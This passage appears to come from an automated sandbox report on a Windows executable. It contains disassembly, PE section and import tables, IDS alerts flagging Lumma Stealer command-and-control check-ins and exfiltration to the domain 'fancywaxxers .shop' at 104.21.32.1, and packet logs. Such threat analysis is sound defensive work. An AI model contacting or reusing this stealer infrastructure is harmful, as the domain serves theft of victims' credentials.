                                                                                                        pop edi
                                                                                                        mov dword ptr [00430800h], ecx
                                                                                                        pop esi
                                                                                                        ret
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 14h
                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                        xorps xmm0, xmm0
                                                                                                        push eax
                                                                                                        movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                        call dword ptr [0042E8F8h]
                                                                                                        mov eax, dword ptr [ebp-08h]
                                                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                                                        mov dword ptr [ebp-04h], eax
                                                                                                        call dword ptr [0042E8B0h]
                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                        call dword ptr [0042E8ACh]
                                                                                                        xor dword ptr [ebp-04h], eax
                                                                                                        lea eax, dword ptr [ebp-14h]
                                                                                                        push eax
                                                                                                        call dword ptr [0042E940h]
                                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                                        lea ecx, dword ptr [ebp-04h]
                                                                                                        xor eax, dword ptr [ebp-14h]
                                                                                                        xor eax, dword ptr [ebp-04h]
                                                                                                        xor eax, ecx
                                                                                                        leave
                                                                                                        ret
                                                                                                        mov eax, 00004000h
                                                                                                        ret
                                                                                                        push 00431AB0h
                                                                                                        call dword ptr [0042E918h]
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        mov al, 01h
                                                                                                        ret
                                                                                                        push 00030000h
                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2e6d00x28.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x350000xe8.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xc98000x2628.BSS
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000x1b9c.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x2a9a80x18.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26e400xc0.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2e84c0x154.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x247fa0x24800b135cf9668d8a70b51fd4c459fb035bfFalse0.5549349850171232data6.561271665586601IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x260000x9f140xa00087c5c6312d66ce557738ea7321694150False0.4290283203125DOS executable (COM)4.923021283143106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x300000x22780x16007c5c184c1d21197b7c3ea737bb7ce3bbFalse0.39506392045454547data4.583345807041613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .CODE0x330000x40x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .tls0x340000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc0x350000xe80x200c23dec9445c3ffba4b3e55bbbe0cebdeFalse0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x360000x1b9c0x1c00e64b1e55f23b9808d12a59ad4d38544aFalse0.7752511160714286data6.540312202227692IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                        .BSS0x380000x4b8000x4b8009ad37d9b1d74e0f82e8e2c1c64c0c8afFalse1.0003265987168874data7.999500592046876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .BSS0x840000x4b8000x4b8009ad37d9b1d74e0f82e8e2c1c64c0c8afFalse1.0003265987168874data7.999500592046876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_MANIFEST0x350600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                                        DLLImport
                                                                                                        KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObject, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishUnited States
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2025-01-01T22:04:57.123034+01002058656ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)1192.168.2.6645451.1.1.153UDP
                                                                                                        2025-01-01T22:04:57.607657+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649712104.21.32.1443TCP
                                                                                                        2025-01-01T22:04:57.607657+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712104.21.32.1443TCP
                                                                                                        2025-01-01T22:04:58.143694+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649712104.21.32.1443TCP
                                                                                                        2025-01-01T22:04:58.143694+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649712104.21.32.1443TCP
                                                                                                        2025-01-01T22:04:58.679432+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649713104.21.32.1443TCP
                                                                                                        2025-01-01T22:04:58.679432+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649713104.21.32.1443TCP
                                                                                                        2025-01-01T22:04:59.155272+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649713104.21.32.1443TCP
                                                                                                        2025-01-01T22:04:59.155272+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649713104.21.32.1443TCP
                                                                                                        2025-01-01T22:04:59.945904+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649714104.21.32.1443TCP
                                                                                                        2025-01-01T22:04:59.945904+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649714104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:01.080623+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649715104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:01.080623+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649715104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:02.222016+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649717104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:02.222016+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649717104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:04.498341+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649718104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:04.498341+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:04.933530+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649718104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:05.841345+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649720104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:05.841345+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649720104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:08.033859+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.649736104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:08.033859+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649736104.21.32.1443TCP
                                                                                                        2025-01-01T22:05:08.503939+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649736104.21.32.1443TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 1, 2025 22:04:57.141161919 CET49712443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:57.141205072 CET44349712104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:57.141273975 CET49712443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:57.144129992 CET49712443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:57.144150972 CET44349712104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:57.607507944 CET44349712104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:57.607656956 CET49712443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:57.616532087 CET49712443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:57.616548061 CET44349712104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:57.616774082 CET44349712104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:57.666836023 CET49712443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:57.715451002 CET49712443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:57.715488911 CET49712443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:57.715635061 CET44349712104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:58.143702984 CET44349712104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:58.143791914 CET44349712104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:58.143846035 CET49712443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:58.145714045 CET49712443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:58.145736933 CET44349712104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:58.145749092 CET49712443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:58.145755053 CET44349712104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:58.208794117 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:58.208842039 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:58.208910942 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:58.220684052 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:58.220714092 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:58.679351091 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:58.679431915 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:58.681804895 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:58.681828976 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:58.682056904 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:58.684286118 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:58.684366941 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:58.684386015 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155289888 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155349970 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155380964 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155407906 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155452967 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155481100 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155503988 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.155528069 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155541897 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.155738115 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155764103 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155783892 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.155786991 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155803919 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.155838013 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.159970999 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.160049915 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.242549896 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.242599964 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.242625952 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.242722988 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.242734909 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.242974997 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.243025064 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.243041039 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.243056059 CET49713443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.243061066 CET44349713104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.488111973 CET49714443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.488156080 CET44349714104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.488250971 CET49714443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.488595009 CET49714443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.488607883 CET44349714104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.945765972 CET44349714104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.945904016 CET49714443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.947271109 CET49714443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.947290897 CET44349714104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.947524071 CET44349714104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:04:59.948836088 CET49714443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.948983908 CET49714443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:04:59.949035883 CET44349714104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:00.514718056 CET44349714104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:00.514807940 CET44349714104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:00.514883041 CET49714443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:00.515080929 CET49714443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:00.515100956 CET44349714104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:00.620748997 CET49715443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:00.620805025 CET44349715104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:00.620914936 CET49715443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:00.621349096 CET49715443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:00.621361971 CET44349715104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:01.080446959 CET44349715104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:01.080622911 CET49715443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:01.082247972 CET49715443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:01.082268953 CET44349715104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:01.082511902 CET44349715104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:01.083724976 CET49715443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:01.083849907 CET49715443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:01.083879948 CET44349715104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:01.083940029 CET49715443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:01.131342888 CET44349715104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:01.572092056 CET44349715104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:01.572196007 CET44349715104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:01.572326899 CET49715443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:01.572526932 CET49715443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:01.572546005 CET44349715104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:01.758465052 CET49717443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:01.758497953 CET44349717104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:01.758565903 CET49717443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:01.758945942 CET49717443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:01.758955002 CET44349717104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:02.221824884 CET44349717104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:02.222016096 CET49717443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:02.223598957 CET49717443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:02.223611116 CET44349717104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:02.223851919 CET44349717104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:02.225168943 CET49717443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:02.225357056 CET49717443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:02.225392103 CET44349717104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:02.225482941 CET49717443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:02.225491047 CET44349717104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:02.804852009 CET44349717104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:02.804965973 CET44349717104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:02.805022955 CET49717443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:02.805371046 CET49717443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:02.805386066 CET44349717104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:04.031783104 CET49718443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:04.031840086 CET44349718104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:04.031924009 CET49718443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:04.032331944 CET49718443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:04.032349110 CET44349718104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:04.498105049 CET44349718104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:04.498341084 CET49718443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:04.499821901 CET49718443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:04.499840021 CET44349718104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:04.500087976 CET44349718104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:04.502446890 CET49718443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:04.502563000 CET49718443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:04.502571106 CET44349718104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:04.933545113 CET44349718104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:04.933659077 CET44349718104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:04.933820963 CET49718443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:04.933959961 CET49718443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:04.933978081 CET44349718104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.389291048 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.389334917 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.389447927 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.389786005 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.389801979 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.841263056 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.841345072 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.842871904 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.842888117 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.843116045 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.885652065 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.896584034 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.897423983 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.897449970 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.897557020 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.897586107 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.897680998 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.897696972 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.897802114 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.897836924 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.897974968 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.898008108 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.898144007 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.898171902 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.907521963 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.907668114 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.907696009 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.907715082 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.907743931 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.907816887 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.907852888 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.907876015 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.912355900 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.912496090 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.912530899 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:05.912556887 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.912594080 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:05.912992001 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:07.540271997 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:07.540381908 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:07.540445089 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:07.540580034 CET49720443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:07.540599108 CET44349720104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:07.558578014 CET49736443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:07.558619022 CET44349736104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:07.558695078 CET49736443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:07.559012890 CET49736443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:07.559026003 CET44349736104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:08.033792973 CET44349736104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:08.033859015 CET49736443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:08.035224915 CET49736443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:08.035233974 CET44349736104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:08.035475016 CET44349736104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:08.036554098 CET49736443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:08.036576033 CET49736443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:08.036608934 CET44349736104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:08.503876925 CET44349736104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:08.504015923 CET44349736104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:08.504070044 CET49736443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:08.504194021 CET49736443192.168.2.6104.21.32.1
                                                                                                        Jan 1, 2025 22:05:08.504209995 CET44349736104.21.32.1192.168.2.6
                                                                                                        Jan 1, 2025 22:05:08.504240036 CET49736443192.168.2.6104.21.32.1
